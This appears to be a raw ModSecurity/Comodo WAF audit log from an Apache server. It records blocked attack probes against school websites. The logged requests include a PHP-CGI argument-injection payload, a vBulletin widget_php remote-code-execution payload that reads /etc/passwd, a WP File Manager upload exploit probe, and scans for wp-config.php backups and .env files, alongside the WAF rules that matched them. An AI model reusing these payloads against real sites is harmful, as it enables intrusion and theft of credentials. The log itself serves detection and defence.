[21/May/2025:12:47:03 +0700] aC1o14v3pT1iV0OxjLToQQAAAJU 103.236.140.4 41990 103.236.140.4 8181 --476c737a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 50.7.40.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 50.7.40.241 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --476c737a-C-- --476c737a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --476c737a-E-- --476c737a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747806423224473 4706 (- - -) Stopwatch2: 1747806423224473 4706; combined=3057, p1=492, p2=2524, p3=0, p4=0, p5=40, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --476c737a-Z-- --7ad37e16-A-- [21/May/2025:14:06:05 +0700] aC17XYv3pT1iV0OxjLTolgAAAJg 103.236.140.4 42488 103.236.140.4 8181 --7ad37e16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.212.200.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.212.200.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7ad37e16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ad37e16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747811165704997 3311 (- - -) Stopwatch2: 1747811165704997 3311; combined=1465, p1=474, p2=950, p3=0, p4=0, p5=41, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ad37e16-Z-- --c9948d68-A-- [21/May/2025:14:27:17 +0700] aC2AVYv3pT1iV0OxjLTotQAAAI4 103.236.140.4 42606 103.236.140.4 8181 --c9948d68-B-- GET /wp-config.php.save.1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --c9948d68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9948d68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812437829921 908 (- - -) Stopwatch2: 1747812437829921 908; combined=352, p1=315, p2=0, p3=0, p4=0, p5=37, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9948d68-Z-- --c09a4028-A-- [21/May/2025:14:27:21 +0700] aC2AWYv3pT1iV0OxjLTotgAAAIw 103.236.140.4 42608 103.236.140.4 8181 --c09a4028-B-- GET /wp-config.php-old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --c09a4028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c09a4028-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812441610546 760 (- - -) Stopwatch2: 1747812441610546 760; combined=294, p1=262, p2=0, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c09a4028-Z-- --d23fc274-A-- [21/May/2025:14:27:22 +0700] aC2AWov3pT1iV0OxjLTotwAAAJA 103.236.140.4 42610 103.236.140.4 8181 --d23fc274-B-- GET /wp-config.php.save. HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --d23fc274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d23fc274-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812442473555 634 (- - -) Stopwatch2: 1747812442473555 634; combined=246, p1=219, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d23fc274-Z-- --bc917b2e-A-- [21/May/2025:14:27:23 +0700] aC2AW4v3pT1iV0OxjLTouAAAAJE 103.236.140.4 42612 103.236.140.4 8181 --bc917b2e-B-- GET /wp-config.php.save.2 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --bc917b2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc917b2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812443122443 650 (- - -) Stopwatch2: 1747812443122443 650; combined=247, p1=220, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc917b2e-Z-- --f0b67110-A-- [21/May/2025:14:27:23 +0700] aC2AWxpv_mIXt2pDBOoHiQAAAMg 103.236.140.4 42618 103.236.140.4 8181 --f0b67110-B-- GET /wp-config.php.save.3 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --f0b67110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0b67110-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812443817221 718 (- - -) Stopwatch2: 1747812443817221 718; combined=261, p1=231, p2=0, p3=0, p4=0, p5=30, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0b67110-Z-- --d03f9d18-A-- [21/May/2025:14:27:24 +0700] aC2AXIv3pT1iV0OxjLTougAAAJQ 103.236.140.4 42620 103.236.140.4 8181 --d03f9d18-B-- GET /wp-config.php.save.4 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --d03f9d18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d03f9d18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812444512242 649 (- - -) Stopwatch2: 1747812444512242 649; combined=243, p1=216, p2=0, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d03f9d18-Z-- --ef50c65a-A-- [21/May/2025:14:27:25 +0700] aC2AXYv3pT1iV0OxjLTouwAAAI8 103.236.140.4 42622 103.236.140.4 8181 --ef50c65a-B-- GET /wp-config.php.save.5 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --ef50c65a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef50c65a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812445180122 643 (- - -) Stopwatch2: 1747812445180122 643; combined=254, p1=227, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef50c65a-Z-- --59251c13-A-- [21/May/2025:14:27:26 +0700] aC2AXov3pT1iV0OxjLTovAAAAJI 103.236.140.4 42624 103.236.140.4 8181 --59251c13-B-- GET /wp-config.php.save.6 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --59251c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59251c13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812446011339 830 (- - -) Stopwatch2: 1747812446011339 830; combined=317, p1=285, p2=0, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59251c13-Z-- --e9831a25-A-- [21/May/2025:14:27:26 +0700] aC2AXov3pT1iV0OxjLTovQAAAJM 103.236.140.4 42626 103.236.140.4 8181 --e9831a25-B-- GET /wp-config.php.save.7 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --e9831a25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9831a25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812446693268 648 (- - -) Stopwatch2: 1747812446693268 648; combined=247, p1=221, p2=0, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9831a25-Z-- --26923649-A-- [21/May/2025:14:27:27 +0700] aC2AXxpv_mIXt2pDBOoHigAAAMk 103.236.140.4 42628 103.236.140.4 8181 --26923649-B-- GET /wp-config.php.save.8 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --26923649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26923649-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812447336091 683 (- - -) Stopwatch2: 1747812447336091 683; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26923649-Z-- --b3883441-A-- [21/May/2025:14:27:27 +0700] aC2AX4v3pT1iV0OxjLTovgAAAJc 103.236.140.4 42630 103.236.140.4 8181 --b3883441-B-- GET /wp-config.php.save.9 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --b3883441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3883441-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812447987009 679 (- - -) Stopwatch2: 1747812447987009 679; combined=277, p1=250, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3883441-Z-- --932d883d-A-- [21/May/2025:14:27:28 +0700] aC2AYIv3pT1iV0OxjLTowAAAAJg 103.236.140.4 42634 103.236.140.4 8181 --932d883d-B-- GET /wp-config.php.save.10 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --932d883d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --932d883d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812448638350 652 (- - -) Stopwatch2: 1747812448638350 652; combined=244, p1=217, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --932d883d-Z-- --fab9fc20-A-- [21/May/2025:14:32:01 +0700] aC2BcYv3pT1iV0OxjLTowQAAAJY 103.236.140.4 42636 103.236.140.4 8181 --fab9fc20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --fab9fc20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fab9fc20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812721447031 779 (- - -) Stopwatch2: 1747812721447031 779; combined=324, p1=292, p2=0, p3=0, p4=0, p5=32, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fab9fc20-Z-- --8f11f942-A-- [21/May/2025:14:53:49 +0700] aC2GjSioYDAgD0WHUjSnngAAAE8 103.236.140.4 42722 103.236.140.4 8181 --8f11f942-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --8f11f942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f11f942-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747814029781622 883 (- - -) Stopwatch2: 1747814029781622 883; combined=336, p1=294, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f11f942-Z-- --de7ad441-A-- [21/May/2025:14:55:33 +0700] aC2G9SioYDAgD0WHUjSnowAAAFU 103.236.140.4 42738 103.236.140.4 8181 --de7ad441-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 167545899 --de7ad441-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --de7ad441-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de7ad441-E-- --de7ad441-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747814133155366 1932 (- - -) Stopwatch2: 1747814133155366 1932; combined=668, p1=457, p2=181, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de7ad441-Z-- --fa68d44b-A-- [21/May/2025:14:55:33 +0700] aC2G9Rpv_mIXt2pDBOoHkgAAANc 103.236.140.4 42764 103.236.140.4 8181 --fa68d44b-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 160557818 --fa68d44b-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --fa68d44b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa68d44b-E-- --fa68d44b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747814133188754 3705 (- - -) Stopwatch2: 1747814133188754 3705; combined=2419, p1=359, p2=2034, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: 